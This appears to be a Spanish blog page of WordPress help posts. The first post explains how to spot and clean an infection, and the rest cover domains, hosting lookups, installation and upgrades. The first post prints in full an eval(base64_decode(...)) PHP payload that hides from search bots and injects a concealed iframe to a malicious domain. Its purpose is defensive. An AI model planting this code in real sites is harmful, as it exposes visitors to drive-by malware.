Iframe en WordPress, posible malware

wordpress logo logotipo con mantenimiento

Quizás hayas notado en tu blog de WordPress, que arriba hay una franja de separación entre tu blog y la barra del navegador, tal y como tiene este blog. Esto puede ser por diseño (como en este blog) o por una instalación de un malware.

Esta franja, si ves el código fuente de la página verá un código parecido a este, justo en la primera línea de tu blog antes de la cabecera:

  < iframe src="web maliciosa" width="1" height="1"

Esto en la mayoría de los casos es debido a un ataque malicioso. Otra forma de comprobar si te están inyectando código a tu WordPress, es editar el archivo index.php del directorio raiz de tu blog. Si encuentras la siguiente expresión o parecida, estarás infectado.

 < ?php eval( base64_decode ('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX 2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));

Quitar esta línea evitará que te inyecte código en tus páginas, pero es una solución temporal.

Lo mejor que puedes hacer es seguir estos pasos:

  1. Realiza una copia de todos los archivos de WordPress.
  2. Borra completamente los archivos de tu blog del hosting.
  3. Instala un WordPress nuevo en tu hosting.
  4. Sube el archivo wp-config.php de la copia del paso 1 al nuevo blog.
  5. Ahora deberías de poder conectar al blog, que conecta a la base de datos. Por lo que deberías de poder entrar en la sección de administración. (no entres en el apartado de plugins, o probablemente se te desactivarán)
  6. Instala el mismo tema que tenías instalado anteriormente.
  7. Ahora copia cada uno en su sitio desde la copia del paso 1, los siguientes directorios.
  • ./wp-content/themes/tu tema
  • ./wp-content/plugins
  • ./wp-content/uploads
  • Cualquier otro directorio que estimes que necesitas para volver a poner tu wordpress en marcha tal y como estaba.

Ahora ya tienes otra vez tu blog en marcha.

Para asegurarnos de que no nos vuelve a suceder, instalaremos el plugin de seguridad Wp-Security Scan

 

Donde registrar el dominio más barato

Registrar dominios baratos en 1 and 1

Llevo varios años probando hostings y dominios y la verdad que en 1and1 es donde estoy registrando los dominios y es el sitio que he encontrado más barato. El hosting al final he optado por montar mi propio servidor, donde por ejemplo está alojado este blog.

Si necesitarías alojar vuestro blog o web en un hosting económico, poneros en contacto conmigo en la sección de contacto y os confeccionaré un presupuesto acorde con vuestras necesidades.

Como saber el hosting de una pagina web

Si quieres conocer donde está alojada una página web, blog, foro, etc, bien sea porque nos gusta la rapidez de esa página o porque es de la competencia y nos interesa saber ese dato, lo podemos hacer de la siguiente manera.

Pinchamos y abrimos la siguiente página WhoisHostingThis, donde podremos introducir la url de la página web que queremos saber donde tiene el hosting, y nos dirá donde está alojada.

como saber o conocer el hosting de una web

Como hacer un blog – en WordPress

WordPress te da una gran facilidad para crear tu propio Blog. En su página web podrás registrarte para iniciar tu camino en crear un blog.

Vamos ha hacer una guia para crear un blog en WordPress.

1.- Entramos en la página web de WordPress y nos registramos.

Registrarte en WordPress

2.- Rellenamos los datos, con el nombre de usuario que vamos a utilizar, la contraseña y la dirección de correo electrónico.

datos de usuario en wordpress

3.- Rellenamos los datos con el nombre del blog, y aquí podremos elegir entre que sea público (que los búscadores como Google nos encuentren) o privado para que pasen los búscadores por nuestro blog.

Datos de nombre del blog en wordpress

4.- Esperamos a que nos llegue el correo de confirmación.

5.- !Ingresamos nuestro nombre de usuario y contraseña y ya podremos empezar a editar nuestro blog!

Pagina de administracion de wordpress

Como instalar WordPress en un servidor online – Guia de instalacion

Si quieres instalar un blog WordPress en un servidor externo a los servidores de WordPress (a parte te saldrá más barato), puedes seguir esta guia para la instalación.

  1. Instalamos una base de datos en el servidor. (muchos alojamientos ofrecen herramientas fáciles, donde sólo tendremos que ingresar el nombre de la base de datos, el usuario y la contraseña). Si no puedes leer el siguiente manual -> como instlar una base de datos en el servidor con phpmyadmin
  2. Descargamos la última versión de WordPress desde aquí: -> última version de WordPress
  3. Descomprimimos el archivo y lo pasamos por Ftp a nuestro directorio (por ejemplo con Filezilla)Subir wordpress a un servidor con filezilla
  4. Ingresamos la siguiente dirección donde tudominio es el nombre de tu dominio. -> http://tudominio/wp-admin/install.php . Posiblemente si no tenemos instalada ninguna base de datos nos saldrá este mensaje. Pincharemos en “Create a Configuration File
  5. create configuration file wordpress

  6. Ingresamos los valores de nuestra base de datos creada en el paso 1
    instalacion de wordpress con base de datos
  7. Configuramos nuestro blog, con cosas como el título, el usuario que vamos a utilizar para entrar y su contraseña, si queremos que los buscadores nos localizen y nuestro correo electrónico. Pinchamos en Install WordPress
    Configuracion inicio de wordpress
  8. Ya sólo tenemos que iniciar la sesión con el usuario y la password definida anteriormente en el paso 6.
    Pantalla de inicio de WordPress usuario y contraseña

Con esto ya tendríamos instalado nuestro blog en WordPress, ahora ya sólo falta personalizarlo y rellenarlo con contenido.

Ahora ya deberíamos de cambiar el tema -> http://resuelvetusproblemas.com/como-instalar-un-nuevo-tema-theme-en-wordpress/ y posiblemente cambiar el idioma -> http://resuelvetusproblemas.com/como-cambiar-el-idioma-en-wordpress/

Como actualizar wordpress a la ultima version

Este ha sido el primer problema que he tenido al crear este blog.

wordpress logo logotipo con mantenimientoEn el hosting en que está alojada la página se puede instalar wordpress sin problemas con un doble click, si tener que hacer nada más. Cuando lo instalé me di cuenta de que estaba trabajando en la version de wordpress 2.6.1 y la versión más actual de wordpress es la 3.0.1.

Revisando varias páginas en internet me hice una idea de como actualizar wordpress a la última versión, que voy a exponer aquí:

1.- Hacer backup de todas las carpetas y archivos del raiz. (Yo lo hice usando filezilla y copiandolo directamente al ordenador, pero se podría hacer dentro del propio servidor).

2.- Hacer backup de la base de datos. Esto es fundamental es donde guarda toda la información de usuarios post, etc. Generalmente en el panel de control de tu hosting, se podrá realizar con un simple Click, o en la herramienta phpMyAdmin, también hay una forma de realizar una copia entera.

3.- Desactiva todos los plugins. Puede ser que la actualización dañe algun plugin, por eso haremos este paso.

4.- Borra estos ficheros que estarán en la raiz de la carpeta donde tengas instalado wordpress.

  1. Todos los ficheros salvo wp-config.php e index.php.
  2. Carpeta wp-admin.
  3. Carpeta wp-includes. Si usas ficheros de idioma borra todo salvo la carpeta wp-includes/languages/

5.- Descárgate la última versión de wordpress y descomprímela.

6.- Copia todos los ficheros que encuentres en la carpeta descomprimida salvo index.php.

7.- Copia la carpeta wp-admin.

8.- Si borraste la carpeta wp-includes entera, copialá entera. Si borraste todo menos /languages/ copia todo salvo la carpeta languages.

9.- Comprueba los plugins en la carpeta wp-contens y compárala con la carpeta descomprimida de tu ordenador, segúramente sean más recientes y se podrían sobrescribir si no funcionaran correctamente.

10.- Actualiza la base de datos. Si no te da un mensaje de actualizar la base de datos cuando entras al panel de control de wordpress, prueba a ecribir esta dirección (“http://tudominio.com/wp-admin/upgrade.php”) para saber si es necesario una actualización de la base de datos.

Si no te ha dado ningún error ya deberías de poder ver en el panel de administrador de wordpress tu versión actualizada. Ahora tienes que reactivar los plugins y en caso necesario actualizar alguno.

Si tienes algún problema puedes plantearnoslo en los comentarios o vistiar los foros oficiales de wordpress donde también te podrán ayudar.

Lo más seguro es que no hayas tenido que utilizar ningún backup, que hicimos en los primeros pasos, pero siempre es recomendable tener una copia de seguridad por si las moscas…